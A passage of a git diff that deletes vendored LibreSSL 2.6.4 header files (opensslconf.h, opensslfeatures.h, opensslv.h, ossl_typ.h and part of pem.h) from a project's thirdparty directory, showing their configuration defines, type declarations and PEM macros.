-#define OCSP_R_STATUS_TOO_OLD				 127
-#define OCSP_R_UNKNOWN_MESSAGE_DIGEST			 119
-#define OCSP_R_UNKNOWN_NID				 120
-#define OCSP_R_UNSUPPORTED_REQUESTORNAME_TYPE		 129
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/opensslconf.h b/thirdparty/libressl/include/openssl/opensslconf.h
deleted file mode 100644
index bb71768..0000000
--- a/thirdparty/libressl/include/openssl/opensslconf.h
+++ /dev/null
@@ -1,153 +0,0 @@
-#include <openssl/opensslfeatures.h>
-/* crypto/opensslconf.h.in */
-
-#if defined(_MSC_VER) && !defined(__attribute__)
-#define __attribute__(a)
-#endif
-
-#if defined(HEADER_CRYPTLIB_H) && !defined(OPENSSLDIR)
-#define OPENSSLDIR "/etc/ssl"
-#endif
-
-#undef OPENSSL_UNISTD
-#define OPENSSL_UNISTD <unistd.h>
-
-#undef OPENSSL_EXPORT_VAR_AS_FUNCTION
-
-#if defined(HEADER_IDEA_H) && !defined(IDEA_INT)
-#define IDEA_INT unsigned int
-#endif
-
-#if defined(HEADER_MD2_H) && !defined(MD2_INT)
-#define MD2_INT unsigned int
-#endif
-
-#if defined(HEADER_RC2_H) && !defined(RC2_INT)
-/* I need to put in a mod for the alpha - eay */
-#define RC2_INT unsigned int
-#endif
-
-#if defined(HEADER_RC4_H)
-#if !defined(RC4_INT)
-/* using int types make the structure larger but make the code faster
- * on most boxes I have tested - up to %20 faster. */
-/*
- * I don't know what does "most" mean, but declaring "int" is a must on:
- * - Intel P6 because partial register stalls are very expensive;
- * - elder Alpha because it lacks byte load/store instructions;
- */
-#define RC4_INT unsigned int
-#endif
-#if !defined(RC4_CHUNK)
-/*
- * This enables code handling data aligned at natural CPU word
- * boundary. See crypto/rc4/rc4_enc.c for further details.
- */
-#define RC4_CHUNK unsigned long
-#endif
-#endif
-
-#if (defined(HEADER_NEW_DES_H) || defined(HEADER_DES_H)) && !defined(DES_LONG)
-/* If this is set to 'unsigned int' on a DEC Alpha, this gives about a
- * %20 speed up (longs are 8 bytes, int's are 4). */
-#ifndef DES_LONG
-#define DES_LONG unsigned int
-#endif
-#endif
-
-#if defined(HEADER_BN_H) && !defined(CONFIG_HEADER_BN_H)
-#define CONFIG_HEADER_BN_H
-#undef BN_LLONG
-
-/* Should we define BN_DIV2W here? */
-
-/* Only one for the following should be defined */
-#define SIXTY_FOUR_BIT_LONG
-#undef SIXTY_FOUR_BIT
-#undef THIRTY_TWO_BIT
-#endif
-
-#if defined(HEADER_RC4_LOCL_H) && !defined(CONFIG_HEADER_RC4_LOCL_H)
-#define CONFIG_HEADER_RC4_LOCL_H
-/* if this is defined data[i] is used instead of *data, this is a %20
- * speedup on x86 */
-#undef RC4_INDEX
-#endif
-
-#if defined(HEADER_BF_LOCL_H) && !defined(CONFIG_HEADER_BF_LOCL_H)
-#define CONFIG_HEADER_BF_LOCL_H
-#undef BF_PTR
-#endif /* HEADER_BF_LOCL_H */
-
-#if defined(HEADER_DES_LOCL_H) && !defined(CONFIG_HEADER_DES_LOCL_H)
-#define CONFIG_HEADER_DES_LOCL_H
-#ifndef DES_DEFAULT_OPTIONS
-/* the following is tweaked from a config script, that is why it is a
- * protected undef/define */
-#ifndef DES_PTR
-#undef DES_PTR
-#endif
-
-/* This helps C compiler generate the correct code for multiple functional
- * units.  It reduces register dependancies at the expense of 2 more
- * registers */
-#ifndef DES_RISC1
-#undef DES_RISC1
-#endif
-
-#ifndef DES_RISC2
-#undef DES_RISC2
-#endif
-
-#if defined(DES_RISC1) && defined(DES_RISC2)
-YOU SHOULD NOT HAVE BOTH DES_RISC1 AND DES_RISC2 DEFINED!!!!!
-#endif
-
-/* Unroll the inner loop, this sometimes helps, sometimes hinders.
- * Very mucy CPU dependant */
-#ifndef DES_UNROLL
-#define DES_UNROLL
-#endif
-
-/* These default values were supplied by
- * Peter Gutman <pgut001@cs.auckland.ac.nz>
- * They are only used if nothing else has been defined */
-#if !defined(DES_PTR) && !defined(DES_RISC1) && !defined(DES_RISC2) && !defined(DES_UNROLL)
-/* Special defines which change the way the code is built depending on the
-   CPU and OS.  For SGI machines you can use _MIPS_SZLONG (32 or 64) to find
-   even newer MIPS CPU's, but at the moment one size fits all for
-   optimization options.  Older Sparc's work better with only UNROLL, but
-   there's no way to tell at compile time what it is you're running on */
- 
-#if defined( sun )		/* Newer Sparc's */
-#  define DES_PTR
-#  define DES_RISC1
-#  define DES_UNROLL
-#elif defined( __ultrix )	/* Older MIPS */
-#  define DES_PTR
-#  define DES_RISC2
-#  define DES_UNROLL
-#elif defined( __osf1__ )	/* Alpha */
-#  define DES_PTR
-#  define DES_RISC2
-#elif defined ( _AIX )		/* RS6000 */
-  /* Unknown */
-#elif defined( __hpux )		/* HP-PA */
-  /* Unknown */
-#elif defined( __aux )		/* 68K */
-  /* Unknown */
-#elif defined( __dgux )		/* 88K (but P6 in latest boxes) */
-#  define DES_UNROLL
-#elif defined( __sgi )		/* Newer MIPS */
-#  define DES_PTR
-#  define DES_RISC2
-#  define DES_UNROLL
-#elif defined(i386) || defined(__i386__)	/* x86 boxes, should be gcc */
-#  define DES_PTR
-#  define DES_RISC1
-#  define DES_UNROLL
-#endif /* Systems-specific speed defines */
-#endif
-
-#endif /* DES_DEFAULT_OPTIONS */
-#endif /* HEADER_DES_LOCL_H */
diff --git a/thirdparty/libressl/include/openssl/opensslfeatures.h b/thirdparty/libressl/include/openssl/opensslfeatures.h
deleted file mode 100644
index ba4dbba..0000000
--- a/thirdparty/libressl/include/openssl/opensslfeatures.h
+++ /dev/null
@@ -1,26 +0,0 @@
-# define OPENSSL_NO_EC_NISTP_64_GCC_128
-# define OPENSSL_NO_CMS
-# define OPENSSL_NO_COMP
-# define OPENSSL_NO_EGD
-# define OPENSSL_NO_GMP
-# define OPENSSL_NO_JPAKE
-# define OPENSSL_NO_KRB5
-# define OPENSSL_NO_MD2
-# define OPENSSL_NO_MDC2
-# define OPENSSL_NO_PSK
-# define OPENSSL_NO_RC5
-# define OPENSSL_NO_RFC3779
-# define OPENSSL_NO_RSAX
-# define OPENSSL_NO_SCTP
-# define OPENSSL_NO_SEED
-# define OPENSSL_NO_SHA0
-# define OPENSSL_NO_SRP
-# define OPENSSL_NO_SSL2
-# define OPENSSL_NO_SSL3
-# define OPENSSL_NO_SSL3_METHOD
-# define OPENSSL_NO_STORE
-# define OPENSSL_NO_BUF_FREELISTS
-# define OPENSSL_NO_HEARTBEATS
-# define OPENSSL_NO_DYNAMIC_ENGINE
-
-# define OPENSSL_THREADS
diff --git a/thirdparty/libressl/include/openssl/opensslv.h b/thirdparty/libressl/include/openssl/opensslv.h
deleted file mode 100644
index c8dd39d..0000000
--- a/thirdparty/libressl/include/openssl/opensslv.h
+++ /dev/null
@@ -1,17 +0,0 @@
-/* $OpenBSD: opensslv.h,v 1.43.4.1 2017/12/11 10:50:37 bcook Exp $ */
-#ifndef HEADER_OPENSSLV_H
-#define HEADER_OPENSSLV_H
-
-/* These will change with each release of LibreSSL-portable */
-#define LIBRESSL_VERSION_NUMBER	0x2060400fL
-#define LIBRESSL_VERSION_TEXT	"LibreSSL 2.6.4"
-
-/* These will never change */
-#define OPENSSL_VERSION_NUMBER	0x20000000L
-#define OPENSSL_VERSION_TEXT	LIBRESSL_VERSION_TEXT
-#define OPENSSL_VERSION_PTEXT	" part of " OPENSSL_VERSION_TEXT
-
-#define SHLIB_VERSION_HISTORY ""
-#define SHLIB_VERSION_NUMBER "1.0.0"
-
-#endif /* HEADER_OPENSSLV_H */
diff --git a/thirdparty/libressl/include/openssl/ossl_typ.h b/thirdparty/libressl/include/openssl/ossl_typ.h
deleted file mode 100644
index b1a9e0e..0000000
--- a/thirdparty/libressl/include/openssl/ossl_typ.h
+++ /dev/null
@@ -1,190 +0,0 @@
-/* $OpenBSD: ossl_typ.h,v 1.13 2015/09/30 04:10:07 doug Exp $ */
-/* ====================================================================
- * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_OPENSSL_TYPES_H
-#define HEADER_OPENSSL_TYPES_H
-
-#include <openssl/opensslconf.h>
-
-typedef struct asn1_string_st ASN1_INTEGER;
-typedef struct asn1_string_st ASN1_ENUMERATED;
-typedef struct asn1_string_st ASN1_BIT_STRING;
-typedef struct asn1_string_st ASN1_OCTET_STRING;
-typedef struct asn1_string_st ASN1_PRINTABLESTRING;
-typedef struct asn1_string_st ASN1_T61STRING;
-typedef struct asn1_string_st ASN1_IA5STRING;
-typedef struct asn1_string_st ASN1_GENERALSTRING;
-typedef struct asn1_string_st ASN1_UNIVERSALSTRING;
-typedef struct asn1_string_st ASN1_BMPSTRING;
-typedef struct asn1_string_st ASN1_UTCTIME;
-typedef struct asn1_string_st ASN1_TIME;
-typedef struct asn1_string_st ASN1_GENERALIZEDTIME;
-typedef struct asn1_string_st ASN1_VISIBLESTRING;
-typedef struct asn1_string_st ASN1_UTF8STRING;
-typedef struct asn1_string_st ASN1_STRING;
-typedef int ASN1_BOOLEAN;
-typedef int ASN1_NULL;
-
-typedef struct ASN1_ITEM_st ASN1_ITEM;
-typedef struct asn1_pctx_st ASN1_PCTX;
-
-#if defined(_WIN32) && defined(__WINCRYPT_H__)
-#ifndef LIBRESSL_INTERNAL
-#ifdef _MSC_VER
-#pragma message("Warning, overriding WinCrypt defines")
-#else
-#warning overriding WinCrypt defines
-#endif
-#endif
-#undef X509_NAME
-#undef X509_CERT_PAIR
-#undef X509_EXTENSIONS
-#undef OCSP_REQUEST
-#undef OCSP_RESPONSE
-#undef PKCS7_ISSUER_AND_SERIAL
-#endif
-
-#ifdef BIGNUM
-#undef BIGNUM
-#endif
-typedef struct bignum_st BIGNUM;
-typedef struct bignum_ctx BN_CTX;
-typedef struct bn_blinding_st BN_BLINDING;
-typedef struct bn_mont_ctx_st BN_MONT_CTX;
-typedef struct bn_recp_ctx_st BN_RECP_CTX;
-typedef struct bn_gencb_st BN_GENCB;
-
-typedef struct buf_mem_st BUF_MEM;
-
-typedef struct evp_cipher_st EVP_CIPHER;
-typedef struct evp_cipher_ctx_st EVP_CIPHER_CTX;
-typedef struct env_md_st EVP_MD;
-typedef struct env_md_ctx_st EVP_MD_CTX;
-typedef struct evp_pkey_st EVP_PKEY;
-
-typedef struct evp_pkey_asn1_method_st EVP_PKEY_ASN1_METHOD;
-
-typedef struct evp_pkey_method_st EVP_PKEY_METHOD;
-typedef struct evp_pkey_ctx_st EVP_PKEY_CTX;
-
-typedef struct dh_st DH;
-typedef struct dh_method DH_METHOD;
-
-typedef struct dsa_st DSA;
-typedef struct dsa_method DSA_METHOD;
-
-typedef struct rsa_st RSA;
-typedef struct rsa_meth_st RSA_METHOD;
-
-typedef struct rand_meth_st RAND_METHOD;
-
-typedef struct ecdh_method ECDH_METHOD;
-typedef struct ecdsa_method ECDSA_METHOD;
-
-typedef struct x509_st X509;
-typedef struct X509_algor_st X509_ALGOR;
-typedef struct X509_crl_st X509_CRL;
-typedef struct x509_crl_method_st X509_CRL_METHOD;
-typedef struct x509_revoked_st X509_REVOKED;
-typedef struct X509_name_st X509_NAME;
-typedef struct X509_pubkey_st X509_PUBKEY;
-typedef struct x509_store_st X509_STORE;
-typedef struct x509_store_ctx_st X509_STORE_CTX;
-
-typedef struct pkcs8_priv_key_info_st PKCS8_PRIV_KEY_INFO;
-
-typedef struct v3_ext_ctx X509V3_CTX;
-typedef struct conf_st CONF;
-
-typedef struct store_st STORE;
-typedef struct store_method_st STORE_METHOD;
-
-typedef struct ui_st UI;
-typedef struct ui_method_st UI_METHOD;
-
-typedef struct st_ERR_FNS ERR_FNS;
-
-typedef struct engine_st ENGINE;
-typedef struct ssl_st SSL;
-typedef struct ssl_ctx_st SSL_CTX;
-
-typedef struct X509_POLICY_NODE_st X509_POLICY_NODE;
-typedef struct X509_POLICY_LEVEL_st X509_POLICY_LEVEL;
-typedef struct X509_POLICY_TREE_st X509_POLICY_TREE;
-typedef struct X509_POLICY_CACHE_st X509_POLICY_CACHE;
-
-typedef struct AUTHORITY_KEYID_st AUTHORITY_KEYID;
-typedef struct DIST_POINT_st DIST_POINT;
-typedef struct ISSUING_DIST_POINT_st ISSUING_DIST_POINT;
-typedef struct NAME_CONSTRAINTS_st NAME_CONSTRAINTS;
-
-/* If placed in pkcs12.h, we end up with a circular depency with pkcs7.h */
-#define DECLARE_PKCS12_STACK_OF(type) /* Nothing */
-#define IMPLEMENT_PKCS12_STACK_OF(type) /* Nothing */
-
-typedef struct crypto_ex_data_st CRYPTO_EX_DATA;
-/* Callback types for crypto.h */
-typedef int CRYPTO_EX_new(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
-    int idx, long argl, void *argp);
-typedef void CRYPTO_EX_free(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
-    int idx, long argl, void *argp);
-typedef int CRYPTO_EX_dup(CRYPTO_EX_DATA *to, CRYPTO_EX_DATA *from,
-    void *from_d, int idx, long argl, void *argp);
-
-typedef struct ocsp_req_ctx_st OCSP_REQ_CTX;
-typedef struct ocsp_response_st OCSP_RESPONSE;
-typedef struct ocsp_responder_id_st OCSP_RESPID;
-
-#endif /* def HEADER_OPENSSL_TYPES_H */
diff --git a/thirdparty/libressl/include/openssl/pem.h b/thirdparty/libressl/include/openssl/pem.h
deleted file mode 100644
index d1916a1..0000000
--- a/thirdparty/libressl/include/openssl/pem.h
+++ /dev/null
@@ -1,618 +0,0 @@
-/* $OpenBSD: pem.h,v 1.17 2016/09/04 16:22:54 jsing Exp $ */
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_PEM_H
-#define HEADER_PEM_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#ifndef OPENSSL_NO_STACK
-#include <openssl/stack.h>
-#endif
-#include <openssl/evp.h>
-#include <openssl/x509.h>
-#include <openssl/pem2.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define PEM_BUFSIZE		1024
-
-#define PEM_OBJ_UNDEF		0
-#define PEM_OBJ_X509		1
-#define PEM_OBJ_X509_REQ	2
-#define PEM_OBJ_CRL		3
-#define PEM_OBJ_SSL_SESSION	4
-#define PEM_OBJ_PRIV_KEY	10
-#define PEM_OBJ_PRIV_RSA	11
-#define PEM_OBJ_PRIV_DSA	12
-#define PEM_OBJ_PRIV_DH		13
-#define PEM_OBJ_PUB_RSA		14
-#define PEM_OBJ_PUB_DSA		15
-#define PEM_OBJ_PUB_DH		16
-#define PEM_OBJ_DHPARAMS	17
-#define PEM_OBJ_DSAPARAMS	18
-#define PEM_OBJ_PRIV_RSA_PUBLIC	19
-#define PEM_OBJ_PRIV_ECDSA	20
-#define PEM_OBJ_PUB_ECDSA	21
-#define PEM_OBJ_ECPARAMETERS	22
-
-#define PEM_ERROR		30
-#define PEM_DEK_DES_CBC         40
-#define PEM_DEK_IDEA_CBC        45
-#define PEM_DEK_DES_EDE         50
-#define PEM_DEK_DES_ECB         60
-#define PEM_DEK_RSA             70
-#define PEM_DEK_RSA_MD2         80
-#define PEM_DEK_RSA_MD5         90
-
-#define PEM_MD_MD2		NID_md2
-#define PEM_MD_MD5		NID_md5
-#define PEM_MD_SHA		NID_sha
-#define PEM_MD_MD2_RSA		NID_md2WithRSAEncryption
-#define PEM_MD_MD5_RSA		NID_md5WithRSAEncryption
-#define PEM_MD_SHA_RSA		NID_sha1WithRSAEncryption
-
-#define PEM_STRING_X509_OLD	"X509 CERTIFICATE"
-#define PEM_STRING_X509		"CERTIFICATE"
-#define PEM_STRING_X509_PAIR	"CERTIFICATE PAIR"
-#define PEM_STRING_X509_TRUSTED	"TRUSTED CERTIFICATE"
-#define PEM_STRING_X509_REQ_OLD	"NEW CERTIFICATE REQUEST"
-#define PEM_STRING_X509_REQ	"CERTIFICATE REQUEST"
-#define PEM_STRING_X509_CRL	"X509 CRL"
-#define PEM_STRING_EVP_PKEY	"ANY PRIVATE KEY"
-#define PEM_STRING_PUBLIC	"PUBLIC KEY"
-#define PEM_STRING_RSA		"RSA PRIVATE KEY"
-#define PEM_STRING_RSA_PUBLIC	"RSA PUBLIC KEY"
-#define PEM_STRING_DSA		"DSA PRIVATE KEY"
-#define PEM_STRING_DSA_PUBLIC	"DSA PUBLIC KEY"
-#define PEM_STRING_PKCS7	"PKCS7"
-#define PEM_STRING_PKCS7_SIGNED	"PKCS #7 SIGNED DATA"
-#define PEM_STRING_PKCS8	"ENCRYPTED PRIVATE KEY"
-#define PEM_STRING_PKCS8INF	"PRIVATE KEY"
-#define PEM_STRING_DHPARAMS	"DH PARAMETERS"
-#define PEM_STRING_SSL_SESSION	"SSL SESSION PARAMETERS"
-#define PEM_STRING_DSAPARAMS	"DSA PARAMETERS"
-#define PEM_STRING_ECDSA_PUBLIC "ECDSA PUBLIC KEY"
-#define PEM_STRING_ECPARAMETERS "EC PARAMETERS"
-#define PEM_STRING_ECPRIVATEKEY	"EC PRIVATE KEY"
-#define PEM_STRING_PARAMETERS	"PARAMETERS"
-#define PEM_STRING_CMS		"CMS"
-
-  /* Note that this structure is initialised by PEM_SealInit and cleaned up
-     by PEM_SealFinal (at least for now) */
-typedef struct PEM_Encode_Seal_st {
-	EVP_ENCODE_CTX encode;
-	EVP_MD_CTX md;
-	EVP_CIPHER_CTX cipher;
-} PEM_ENCODE_SEAL_CTX;
-
-/* enc_type is one off */
-#define PEM_TYPE_ENCRYPTED      10
-#define PEM_TYPE_MIC_ONLY       20
-#define PEM_TYPE_MIC_CLEAR      30
-#define PEM_TYPE_CLEAR		40
-
-typedef struct pem_recip_st {
-	char *name;
-	X509_NAME *dn;
-
-	int cipher;
-	int key_enc;
-	/*	char iv[8]; unused and wrong size */
-} PEM_USER;
-
-typedef struct pem_ctx_st {
-	int type;		/* what type of object */
-
-	struct	{
-		int version;
-		int mode;
-	} proc_type;
-
-	char *domain;
-
-	struct	{
-		int cipher;
-	/* unused, and wrong size
-	   unsigned char iv[8]; */
-	} DEK_info;
-
-	PEM_USER *originator;
-
-	int num_recipient;
-	PEM_USER **recipient;
-
-	/* XXX(ben): don#t think this is used!
-		STACK *x509_chain;	/ * certificate chain */
-	EVP_MD *md;		/* signature type */
-
-	int md_enc;		/* is the md encrypted or not? */
-	int md_len;		/* length of md_data */
-	char *md_data;		/* message digest, could be pkey encrypted */
-
-	EVP_CIPHER *dec;	/* date encryption cipher */
-	int key_len;		/* key length */
-	unsigned char *key;	/* key */
-	/* unused, and wrong size
-	   unsigned char iv[8]; */
-
-	int  data_enc;		/* is the data encrypted */
-	int data_len;
-	unsigned char *data;
-} PEM_CTX;
-
-#ifndef LIBRESSL_INTERNAL
-/* These macros make the PEM_read/PEM_write functions easier to maintain and
- * write. Now they are all implemented with either:
- * IMPLEMENT_PEM_rw(...) or IMPLEMENT_PEM_rw_cb(...)
- */
-
-#define IMPLEMENT_PEM_read_fp(name, type, str, asn1) \
-type *PEM_read_##name(FILE *fp, type **x, pem_password_cb *cb, void *u)\
-{ \
-return PEM_ASN1_read((d2i_of_void *)d2i_##asn1, str,fp,(void **)x,cb,u); \
-}
-
-#define IMPLEMENT_PEM_write_fp(name, type, str, asn1) \
-int PEM_write_##name(FILE *fp, type *x) \
-{ \
-return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,x,NULL,NULL,0,NULL,NULL); \
-}
-
-#define IMPLEMENT_PEM_write_fp_const(name, type, str, asn1) \
-int PEM_write_##name(FILE *fp, const type *x) \
-{ \
-return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,(void *)x,NULL,NULL,0,NULL,NULL); \
-}
-
-#define IMPLEMENT_PEM_write_cb_fp(name, type, str, asn1) \
-int PEM_write_##name(FILE *fp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, \
-		  void *u) \
-	{ \
-	return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,x,enc,kstr,klen,cb,u); \
-	}
-
-#define IMPLEMENT_PEM_write_cb_fp_const(name, type, str, asn1) \
-int PEM_write_##name(FILE *fp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, \
-		  void *u) \
-	{ \
-	return PEM_ASN1_write((i2d_of_void *)i2d_##asn1,str,fp,x,enc,kstr,klen,cb,u); \
-	}
-
-
-#define IMPLEMENT_PEM_read_bio(name, type, str, asn1) \
-type *PEM_read_bio_##name(BIO *bp, type **x, pem_password_cb *cb, void *u)\
-{ \
-return PEM_ASN1_read_bio((d2i_of_void *)d2i_##asn1, str,bp,(void **)x,cb,u); \
-}
-
-#define IMPLEMENT_PEM_write_bio(name, type, str, asn1) \
-int PEM_write_bio_##name(BIO *bp, type *x) \
-{ \
-return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,x,NULL,NULL,0,NULL,NULL); \
-}
-
-#define IMPLEMENT_PEM_write_bio_const(name, type, str, asn1) \
-int PEM_write_bio_##name(BIO *bp, const type *x) \
-{ \
-return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,(void *)x,NULL,NULL,0,NULL,NULL); \
-}
-
-#define IMPLEMENT_PEM_write_cb_bio(name, type, str, asn1) \
-int PEM_write_bio_##name(BIO *bp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, void *u) \
-	{ \
-	return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,x,enc,kstr,klen,cb,u); \
-	}
-
-#define IMPLEMENT_PEM_write_cb_bio_const(name, type, str, asn1) \
-int PEM_write_bio_##name(BIO *bp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, void *u) \
-	{ \
-	return PEM_ASN1_write_bio((i2d_of_void *)i2d_##asn1,str,bp,(void *)x,enc,kstr,klen,cb,u); \
-	}
-
-#define IMPLEMENT_PEM_write(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_bio(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_fp(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_write_const(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_bio_const(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_fp_const(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_write_cb(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_cb_bio(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_cb_fp(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_write_cb_const(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_cb_bio_const(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_cb_fp_const(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_read(name, type, str, asn1) \
-	IMPLEMENT_PEM_read_bio(name, type, str, asn1) \
-	IMPLEMENT_PEM_read_fp(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_rw(name, type, str, asn1) \
-	IMPLEMENT_PEM_read(name, type, str, asn1) \
-	IMPLEMENT_PEM_write(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_rw_const(name, type, str, asn1) \
-	IMPLEMENT_PEM_read(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_const(name, type, str, asn1)
-
-#define IMPLEMENT_PEM_rw_cb(name, type, str, asn1) \
-	IMPLEMENT_PEM_read(name, type, str, asn1) \
-	IMPLEMENT_PEM_write_cb(name, type, str, asn1)
-
-#endif
-
-/* These are the same except they are for the declarations */
-
-
-#define DECLARE_PEM_read_fp(name, type) \
-	type *PEM_read_##name(FILE *fp, type **x, pem_password_cb *cb, void *u);
-
-#define DECLARE_PEM_write_fp(name, type) \
-	int PEM_write_##name(FILE *fp, type *x);
-
-#define DECLARE_PEM_write_fp_const(name, type) \
-	int PEM_write_##name(FILE *fp, const type *x);
-
-#define DECLARE_PEM_write_cb_fp(name, type) \
-	int PEM_write_##name(FILE *fp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, void *u);
-
-
-#ifndef OPENSSL_NO_BIO
-#define DECLARE_PEM_read_bio(name, type) \
-	type *PEM_read_bio_##name(BIO *bp, type **x, pem_password_cb *cb, void *u);
-
-#define DECLARE_PEM_write_bio(name, type) \
-	int PEM_write_bio_##name(BIO *bp, type *x);
-
-#define DECLARE_PEM_write_bio_const(name, type) \
-	int PEM_write_bio_##name(BIO *bp, const type *x);
-
-#define DECLARE_PEM_write_cb_bio(name, type) \
-	int PEM_write_bio_##name(BIO *bp, type *x, const EVP_CIPHER *enc, \
-	     unsigned char *kstr, int klen, pem_password_cb *cb, void *u);
-
-#else
-
-#define DECLARE_PEM_read_bio(name, type) /**/
